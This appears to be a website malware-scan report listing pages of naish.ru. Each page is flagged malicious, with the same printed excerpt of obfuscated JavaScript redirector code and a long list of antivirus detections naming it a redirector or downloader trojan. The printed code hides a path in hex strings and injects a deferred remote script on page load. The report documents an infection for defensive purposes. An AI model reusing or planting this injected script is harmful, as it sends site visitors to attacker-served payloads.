Request | Server response | Status |
http://www.naish.ru/ | 200 OK Content-Length: 34436 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();Antivirus reports:- AntiVir
- JS/Redirector.DB.4
- Avast
- JS:Illredir-AQ [Trj]
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Script.429224
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_KEMPAR.SM
- Emsisoft
- Trojan.Script.429224 (B)
- Comodo
- TrojWare.JS.Redirector.UA
- McAfee-GW-Edition
- JS/Redirector.u
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_KEMPAR.SM
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- Microsoft
- Trojan:JS/Redirector.DB
- MicroWorld-eScan
- Trojan.Script.429224
- Fortinet
- JS/Crypt.BBES!tr
- Jiangmin
- Trojan/JS.Pegel.b
- McAfee
- JS/Redirector.u
- NANO-Antivirus
- Trojan.Script.Redirector.yrnhc
- F-Secure
- Trojan.Script.429224
- VIPRE
- Trojan.JS.Redirector.cr (v)
- F-Prot
- JS/Redir.AV
- AVG
- JS/Dropper
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Script.429224
- Commtouch
- JS/Redir.AV
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AP
- BitDefender
- Trojan.Script.429224
|
http://www.naish.ru/ru/news/detail.php?ID=575 | 200 OK Content-Length: 34313 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();Antivirus reports:- AntiVir
- JS/Redirector.DB.4
- Avast
- JS:Illredir-AQ [Trj]
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Script.429224
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_KEMPAR.SM
- Emsisoft
- Trojan.Script.429224 (B)
- Comodo
- TrojWare.JS.Redirector.UA
- McAfee-GW-Edition
- JS/Redirector.u
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_KEMPAR.SM
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- Microsoft
- Trojan:JS/Redirector.DB
- MicroWorld-eScan
- Trojan.Script.429224
- Fortinet
- JS/Crypt.BBES!tr
- Jiangmin
- Trojan/JS.Pegel.b
- McAfee
- JS/Redirector.u
- NANO-Antivirus
- Trojan.Script.Redirector.yrnhc
- F-Secure
- Trojan.Script.429224
- VIPRE
- Trojan.JS.Redirector.cr (v)
- F-Prot
- JS/Redir.AV
- AVG
- JS/Dropper
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Script.429224
- Commtouch
- JS/Redir.AV
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AP
- BitDefender
- Trojan.Script.429224
|
http://www.naish.ru/ru/news/ | 200 OK Content-Length: 150771 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();Antivirus reports:- AntiVir
- JS/Redirector.DB.4
- Avast
- JS:Illredir-AQ [Trj]
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Script.429224
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_KEMPAR.SM
- Emsisoft
- Trojan.Script.429224 (B)
- Comodo
- TrojWare.JS.Redirector.UA
- McAfee-GW-Edition
- JS/Redirector.u
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_KEMPAR.SM
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- Microsoft
- Trojan:JS/Redirector.DB
- MicroWorld-eScan
- Trojan.Script.429224
- Fortinet
- JS/Crypt.BBES!tr
- Jiangmin
- Trojan/JS.Pegel.b
- McAfee
- JS/Redirector.u
- NANO-Antivirus
- Trojan.Script.Redirector.yrnhc
- F-Secure
- Trojan.Script.429224
- VIPRE
- Trojan.JS.Redirector.cr (v)
- F-Prot
- JS/Redir.AV
- AVG
- JS/Dropper
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Script.429224
- Commtouch
- JS/Redir.AV
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AP
- BitDefender
- Trojan.Script.429224
|
http://www.naish.ru/ru/?PHPSESSID=7e8b14de97eaf92882728f94d7a6c6c9 | 200 OK Content-Length: 34436 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();Antivirus reports:- AntiVir
- JS/Redirector.DB.4
- Avast
- JS:Illredir-AQ [Trj]
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Script.429224
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_KEMPAR.SM
- Emsisoft
- Trojan.Script.429224 (B)
- Comodo
- TrojWare.JS.Redirector.UA
- McAfee-GW-Edition
- JS/Redirector.u
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_KEMPAR.SM
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- Microsoft
- Trojan:JS/Redirector.DB
- MicroWorld-eScan
- Trojan.Script.429224
- Fortinet
- JS/Crypt.BBES!tr
- Jiangmin
- Trojan/JS.Pegel.b
- McAfee
- JS/Redirector.u
- NANO-Antivirus
- Trojan.Script.Redirector.yrnhc
- F-Secure
- Trojan.Script.429224
- VIPRE
- Trojan.JS.Redirector.cr (v)
- F-Prot
- JS/Redir.AV
- AVG
- JS/Dropper
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Script.429224
- Commtouch
- JS/Redir.AV
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AP
- BitDefender
- Trojan.Script.429224
|
http://www.naish.ru/ru/ | 200 OK Content-Length: 34436 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();Antivirus reports:- AntiVir
- JS/Redirector.DB.4
- Avast
- JS:Illredir-AQ [Trj]
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Script.429224
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_KEMPAR.SM
- Emsisoft
- Trojan.Script.429224 (B)
- Comodo
- TrojWare.JS.Redirector.UA
- McAfee-GW-Edition
- JS/Redirector.u
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_KEMPAR.SM
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- Microsoft
- Trojan:JS/Redirector.DB
- MicroWorld-eScan
- Trojan.Script.429224
- Fortinet
- JS/Crypt.BBES!tr
- Jiangmin
- Trojan/JS.Pegel.b
- McAfee
- JS/Redirector.u
- NANO-Antivirus
- Trojan.Script.Redirector.yrnhc
- F-Secure
- Trojan.Script.429224
- VIPRE
- Trojan.JS.Redirector.cr (v)
- F-Prot
- JS/Redir.AV
- AVG
- JS/Dropper
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Script.429224
- Commtouch
- JS/Redir.AV
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AP
- BitDefender
- Trojan.Script.429224
|
http://www.naish.ru/ru/?PHPSESSID=a997dc4148479b6fc1acc162043ad1d9 | 200 OK Content-Length: 34436 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();Antivirus reports:- AntiVir
- JS/Redirector.DB.4
- Avast
- JS:Illredir-AQ [Trj]
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Script.429224
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_KEMPAR.SM
- Emsisoft
- Trojan.Script.429224 (B)
- Comodo
- TrojWare.JS.Redirector.UA
- McAfee-GW-Edition
- JS/Redirector.u
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_KEMPAR.SM
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- Microsoft
- Trojan:JS/Redirector.DB
- MicroWorld-eScan
- Trojan.Script.429224
- Fortinet
- JS/Crypt.BBES!tr
- Jiangmin
- Trojan/JS.Pegel.b
- McAfee
- JS/Redirector.u
- NANO-Antivirus
- Trojan.Script.Redirector.yrnhc
- F-Secure
- Trojan.Script.429224
- VIPRE
- Trojan.JS.Redirector.cr (v)
- F-Prot
- JS/Redir.AV
- AVG
- JS/Dropper
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Script.429224
- Commtouch
- JS/Redir.AV
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AP
- BitDefender
- Trojan.Script.429224
|
http://www.naish.ru/ru/catalog/?PHPSESSID=a997dc4148479b6fc1acc162043ad1d9 | 200 OK Content-Length: 56931 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();Antivirus reports:- AntiVir
- JS/Redirector.DB.4
- Avast
- JS:Illredir-AQ [Trj]
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Script.429224
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_KEMPAR.SM
- Emsisoft
- Trojan.Script.429224 (B)
- Comodo
- TrojWare.JS.Redirector.UA
- McAfee-GW-Edition
- JS/Redirector.u
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_KEMPAR.SM
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- Microsoft
- Trojan:JS/Redirector.DB
- MicroWorld-eScan
- Trojan.Script.429224
- Fortinet
- JS/Crypt.BBES!tr
- Jiangmin
- Trojan/JS.Pegel.b
- McAfee
- JS/Redirector.u
- NANO-Antivirus
- Trojan.Script.Redirector.yrnhc
- F-Secure
- Trojan.Script.429224
- VIPRE
- Trojan.JS.Redirector.cr (v)
- F-Prot
- JS/Redir.AV
- AVG
- JS/Dropper
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Script.429224
- Commtouch
- JS/Redir.AV
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AP
- BitDefender
- Trojan.Script.429224
|
http://www.naish.ru/ru/catalog/ | 200 OK Content-Length: 56931 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();Antivirus reports:- AntiVir
- JS/Redirector.DB.4
- Avast
- JS:Illredir-AQ [Trj]
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Script.429224
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_KEMPAR.SM
- Emsisoft
- Trojan.Script.429224 (B)
- Comodo
- TrojWare.JS.Redirector.UA
- McAfee-GW-Edition
- JS/Redirector.u
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_KEMPAR.SM
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- Microsoft
- Trojan:JS/Redirector.DB
- MicroWorld-eScan
- Trojan.Script.429224
- Fortinet
- JS/Crypt.BBES!tr
- Jiangmin
- Trojan/JS.Pegel.b
- McAfee
- JS/Redirector.u
- NANO-Antivirus
- Trojan.Script.Redirector.yrnhc
- F-Secure
- Trojan.Script.429224
- VIPRE
- Trojan.JS.Redirector.cr (v)
- F-Prot
- JS/Redir.AV
- AVG
- JS/Dropper
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Script.429224
- Commtouch
- JS/Redir.AV
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AP
- BitDefender
- Trojan.Script.429224
|
http://www.naish.ru/ru/?PHPSESSID=1f39e4b83fc1cf2ce8e096bc6c10649d | 200 OK Content-Length: 34436 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();Antivirus reports:- AntiVir
- JS/Redirector.DB.4
- Avast
- JS:Illredir-AQ [Trj]
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Script.429224
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_KEMPAR.SM
- Emsisoft
- Trojan.Script.429224 (B)
- Comodo
- TrojWare.JS.Redirector.UA
- McAfee-GW-Edition
- JS/Redirector.u
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_KEMPAR.SM
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- Microsoft
- Trojan:JS/Redirector.DB
- MicroWorld-eScan
- Trojan.Script.429224
- Fortinet
- JS/Crypt.BBES!tr
- Jiangmin
- Trojan/JS.Pegel.b
- McAfee
- JS/Redirector.u
- NANO-Antivirus
- Trojan.Script.Redirector.yrnhc
- F-Secure
- Trojan.Script.429224
- VIPRE
- Trojan.JS.Redirector.cr (v)
- F-Prot
- JS/Redir.AV
- AVG
- JS/Dropper
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Script.429224
- Commtouch
- JS/Redir.AV
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AP
- BitDefender
- Trojan.Script.429224
|
http://www.naish.ru/ru/catalog/?PHPSESSID=1f39e4b83fc1cf2ce8e096bc6c10649d | 200 OK Content-Length: 56931 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();Antivirus reports:- AntiVir
- JS/Redirector.DB.4
- Avast
- JS:Illredir-AQ [Trj]
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Script.429224
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_KEMPAR.SM
- Emsisoft
- Trojan.Script.429224 (B)
- Comodo
- TrojWare.JS.Redirector.UA
- McAfee-GW-Edition
- JS/Redirector.u
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_KEMPAR.SM
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- Microsoft
- Trojan:JS/Redirector.DB
- MicroWorld-eScan
- Trojan.Script.429224
- Fortinet
- JS/Crypt.BBES!tr
- Jiangmin
- Trojan/JS.Pegel.b
- McAfee
- JS/Redirector.u
- NANO-Antivirus
- Trojan.Script.Redirector.yrnhc
- F-Secure
- Trojan.Script.429224
- VIPRE
- Trojan.JS.Redirector.cr (v)
- F-Prot
- JS/Redir.AV
- AVG
- JS/Dropper
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Script.429224
- Commtouch
- JS/Redir.AV
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AP
- BitDefender
- Trojan.Script.429224
|
http://www.naish.ru/ru/news/?PHPSESSID=1f39e4b83fc1cf2ce8e096bc6c10649d | 200 OK Content-Length: 150771 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();Antivirus reports:- AntiVir
- JS/Redirector.DB.4
- Avast
- JS:Illredir-AQ [Trj]
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Script.429224
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- JS_KEMPAR.SM
- Emsisoft
- Trojan.Script.429224 (B)
- Comodo
- TrojWare.JS.Redirector.UA
- McAfee-GW-Edition
- JS/Redirector.u
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_KEMPAR.SM
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- Microsoft
- Trojan:JS/Redirector.DB
- MicroWorld-eScan
- Trojan.Script.429224
- Fortinet
- JS/Crypt.BBES!tr
- Jiangmin
- Trojan/JS.Pegel.b
- McAfee
- JS/Redirector.u
- NANO-Antivirus
- Trojan.Script.Redirector.yrnhc
- F-Secure
- Trojan.Script.429224
- VIPRE
- Trojan.JS.Redirector.cr (v)
- F-Prot
- JS/Redir.AV
- AVG
- JS/Dropper
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Script.429224
- Commtouch
- JS/Redir.AV
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AP
- BitDefender
- Trojan.Script.429224
|
http://www.naish.ru/ru/club/?PHPSESSID=1f39e4b83fc1cf2ce8e096bc6c10649d | 200 OK Content-Length: 22965 Content-Type: text/html | malicious |
